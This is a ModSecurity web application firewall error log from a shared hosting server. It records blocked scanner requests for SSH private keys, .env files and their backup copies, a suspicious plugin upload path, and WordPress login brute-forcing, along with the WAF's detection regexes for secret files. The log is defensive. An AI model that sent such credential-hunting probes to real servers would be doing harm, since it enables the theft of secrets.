[Tue May 26 19:02:56.336976 2026] [security2:error] [pid 1045635:tid 1045791] [client 5.255.99.53:53436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/.ssh/id_rsa"] [unique_id "ahWhCBhDcQXYr7SS5sUg7gAAABo"]
[Tue May 26 19:02:56.455266 2026] [security2:error] [pid 1045635:tid 1045824] [client 5.255.99.53:53252] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgqAAAADs"]
[Tue May 26 19:02:56.470292 2026] [security2:error] [pid 1045635:tid 1045847] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgsAAAAFI"]
[Tue May 26 19:02:56.521694 2026] [security2:error] [pid 1045635:tid 1045882] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgsgAAAHU"]
[Tue May 26 19:02:56.526999 2026] [security2:error] [pid 1045635:tid 1045790] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgswAAABk"]
[Tue May 26 19:02:56.530482 2026] [security2:error] [pid 1045635:tid 1045773] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgqgAAAAg"]
[Tue May 26 19:02:56.614960 2026] [security2:error] [pid 1045635:tid 1045803] [client 5.255.99.53:53462] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgwQAAACY"]
[Tue May 26 19:02:56.620634 2026] [security2:error] [pid 1045635:tid 1045783] [client 5.255.99.53:53564] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgwAAAABI"]
[Tue May 26 19:02:56.625897 2026] [security2:error] [pid 1045635:tid 1045878] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgxgAAAHE"]
[Tue May 26 19:02:56.632268 2026] [security2:error] [pid 1045635:tid 1045801] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgxAAAACQ"]
[Tue May 26 19:02:56.696815 2026] [security2:error] [pid 1045635:tid 1045866] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgyQAAAGU"]
[Tue May 26 19:02:56.797518 2026] [security2:error] [pid 1045635:tid 1045776] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUg0gAAAAs"]
[Tue May 26 19:02:56.820596 2026] [security2:error] [pid 1045635:tid 1045772] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUg0QAAAAc"]
[Tue May 26 19:02:56.870950 2026] [security2:error] [pid 1045635:tid 1045795] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUg2AAAAB4"]
[Tue May 26 19:02:57.267513 2026] [security2:error] [pid 1045635:tid 1045848] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCBhDcQXYr7SS5sUg8gAAAFM"]
[Tue May 26 19:02:57.314618 2026] [security2:error] [pid 1045635:tid 1045765] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCBhDcQXYr7SS5sUg7QAAAAA"]
[Tue May 26 19:02:58.163131 2026] [security2:error] [pid 1045635:tid 1045819] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhGgAAADY"]
[Tue May 26 19:02:58.687468 2026] [security2:error] [pid 1045635:tid 1045841] [client 5.255.99.53:53234] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhJwAAAEw"]
[Tue May 26 19:02:58.695652 2026] [security2:error] [pid 1045635:tid 1045825] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhOQAAADw"]
[Tue May 26 19:02:58.705820 2026] [security2:error] [pid 1045635:tid 1045844] [client 5.255.99.53:53408] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhHwAAAE8"]
[Tue May 26 19:02:58.705863 2026] [security2:error] [pid 1045635:tid 1045800] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhHgAAACM"]
[Tue May 26 19:02:58.707491 2026] [security2:error] [pid 1045635:tid 1045832] [client 5.255.99.53:53326] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhIwAAAEM"]
[Tue May 26 19:02:58.708087 2026] [security2:error] [pid 1045635:tid 1045773] [client 5.255.99.53:53442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhIAAAAAg"]
[Tue May 26 19:02:58.708661 2026] [security2:error] [pid 1045635:tid 1045789] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhPgAAABg"]
[Tue May 26 19:02:58.717707 2026] [security2:error] [pid 1045635:tid 1045777] [client 5.255.99.53:53564] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhJgAAAAw"]
[Tue May 26 19:02:58.721874 2026] [security2:error] [pid 1045635:tid 1045821] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhMgAAADg"]
[Tue May 26 19:02:58.723058 2026] [security2:error] [pid 1045635:tid 1045799] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhOgAAACI"]
[Tue May 26 19:02:58.733100 2026] [security2:error] [pid 1045635:tid 1045872] [client 5.255.99.53:53342] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhKAAAAGs"]
[Tue May 26 19:02:58.733842 2026] [security2:error] [pid 1045635:tid 1045836] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhPwAAAEc"]
[Tue May 26 19:02:58.738592 2026] [security2:error] [pid 1045635:tid 1045860] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhPQAAAF8"]
[Tue May 26 19:02:58.739006 2026] [security2:error] [pid 1045635:tid 1045812] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhOwAAAC8"]
[Tue May 26 19:02:58.740740 2026] [security2:error] [pid 1045635:tid 1045842] [client 5.255.99.53:53284] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhLAAAAE0"]
[Tue May 26 19:02:58.744463 2026] [security2:error] [pid 1045635:tid 1045776] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhQAAAAAs"]
[Tue May 26 19:02:58.748221 2026] [security2:error] [pid 1045635:tid 1045785] [client 5.255.99.53:53252] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhMQAAABQ"]
[Tue May 26 19:02:58.753168 2026] [security2:error] [pid 1045635:tid 1045878] [client 5.255.99.53:53462] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhJQAAAHE"]
[Tue May 26 19:02:58.755181 2026] [security2:error] [pid 1045635:tid 1045831] [client 5.255.99.53:53436] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhIQAAAEI"]
[Tue May 26 19:02:58.756950 2026] [security2:error] [pid 1045635:tid 1045826] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCRhDcQXYr7SS5sUhNQAAAD0"]
[Tue May 26 19:03:00.357095 2026] [security2:error] [pid 1045635:tid 1045880] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhCxhDcQXYr7SS5sUhigAAAHM"]
[Tue May 26 19:03:00.441163 2026] [security2:error] [pid 1045635:tid 1045778] [client 203.162.188.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhCxhDcQXYr7SS5sUhkAAAAA0"]
[Tue May 26 19:03:00.630012 2026] [security2:error] [pid 1045635:tid 1045795] [client 5.255.99.53:52944] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCxhDcQXYr7SS5sUheAAAAB4"]
[Tue May 26 19:03:00.706239 2026] [security2:error] [pid 1045635:tid 1045790] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCxhDcQXYr7SS5sUhfgAAABk"]
[Tue May 26 19:03:00.786813 2026] [security2:error] [pid 1045635:tid 1045771] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCxhDcQXYr7SS5sUhhAAAAAY"]
[Tue May 26 19:03:00.788270 2026] [security2:error] [pid 1045635:tid 1045821] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhCxhDcQXYr7SS5sUhfQAAADg"]
[Tue May 26 19:03:01.020439 2026] [security2:error] [pid 1045635:tid 1045776] [client 5.255.99.53:53534] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhDBhDcQXYr7SS5sUhkwAAAAs"]
[Tue May 26 19:03:01.046258 2026] [security2:error] [pid 1045635:tid 1045842] [client 5.255.99.53:53326] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhDBhDcQXYr7SS5sUhkgAAAE0"]
[Tue May 26 19:03:02.484556 2026] [security2:error] [pid 1045635:tid 1045849] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhDhhDcQXYr7SS5sUh2AAAAFQ"]
[Tue May 26 19:03:02.719105 2026] [security2:error] [pid 1045635:tid 1045766] [client 191.101.157.243:13505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.157.101.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWhDhhDcQXYr7SS5sUh3gAAAAE"]
[Tue May 26 19:03:03.362017 2026] [proxy:error] [pid 1045635:tid 1045807] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:03:03.362082 2026] [proxy_http:error] [pid 1045635:tid 1045807] [client 142.248.80.35:28924] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:03:03.362679 2026] [proxy:error] [pid 1045635:tid 1045807] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:03:03.362709 2026] [proxy_http:error] [pid 1045635:tid 1045807] [client 142.248.80.35:28924] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:03:04.848089 2026] [security2:error] [pid 1045635:tid 1045721] [remote 103.95.119.103:35680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWhEBhDcQXYr7SS5sUiGwAAVFU"]
[Tue May 26 19:03:04.916285 2026] [security2:error] [pid 1045635:tid 1045821] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhEBhDcQXYr7SS5sUiEwAAADg"]
[Tue May 26 19:03:05.981941 2026] [security2:error] [pid 1045635:tid 1045636] [remote 103.95.119.103:35680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWhERhDcQXYr7SS5sUiWwAAKQA"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 19:03:06.792800 2026] [security2:error] [pid 1045635:tid 1045781] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhEhhDcQXYr7SS5sUicgAAABA"]
[Tue May 26 19:03:07.580388 2026] [security2:error] [pid 1045635:tid 1045752] [remote 72.167.150.128:42598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWhExhDcQXYr7SS5sUikwAAKXQ"]
[Tue May 26 19:03:07.883532 2026] [security2:error] [pid 1045635:tid 1045644] [remote 72.167.150.128:42598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWhExhDcQXYr7SS5sUimgAANQg"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 19:03:09.620772 2026] [security2:error] [pid 1045635:tid 1045865] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhFRhDcQXYr7SS5sUixAAAAGQ"]
[Tue May 26 19:03:09.924214 2026] [security2:error] [pid 1045635:tid 1045774] [client 142.248.80.164:14386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahWhFRhDcQXYr7SS5sUi3gAAAAk"]
[Tue May 26 19:03:10.125258 2026] [security2:error] [pid 1045635:tid 1045766] [client 142.248.80.164:14410] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahWhFhhDcQXYr7SS5sUi_AAAAAE"]
[Tue May 26 19:03:10.125896 2026] [security2:error] [pid 1045635:tid 1045842] [client 142.248.80.164:14426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahWhFhhDcQXYr7SS5sUi-wAAAE0"]
[Tue May 26 19:03:10.126145 2026] [security2:error] [pid 1045635:tid 1045787] [client 142.248.80.164:14404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahWhFhhDcQXYr7SS5sUi_QAAABY"]
[Tue May 26 19:03:11.333644 2026] [security2:error] [pid 1045635:tid 1045856] [client 172.225.77.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWhFxhDcQXYr7SS5sUjHgAAAFs"]
[Tue May 26 19:03:11.715348 2026] [security2:error] [pid 1045635:tid 1045808] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhFxhDcQXYr7SS5sUjLAAAACs"]
[Tue May 26 19:03:12.520353 2026] [security2:error] [pid 1045635:tid 1045774] [client 142.248.80.164:14618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahWhGBhDcQXYr7SS5sUjUAAAAAk"]
[Tue May 26 19:03:12.670725 2026] [security2:error] [pid 1045635:tid 1045656] [remote 208.109.188.137:58608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWhGBhDcQXYr7SS5sUjTwAATBQ"]
[Tue May 26 19:03:12.934812 2026] [security2:error] [pid 1045635:tid 1045871] [client 142.248.80.164:14830] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahWhGBhDcQXYr7SS5sUjYQAAAGo"]
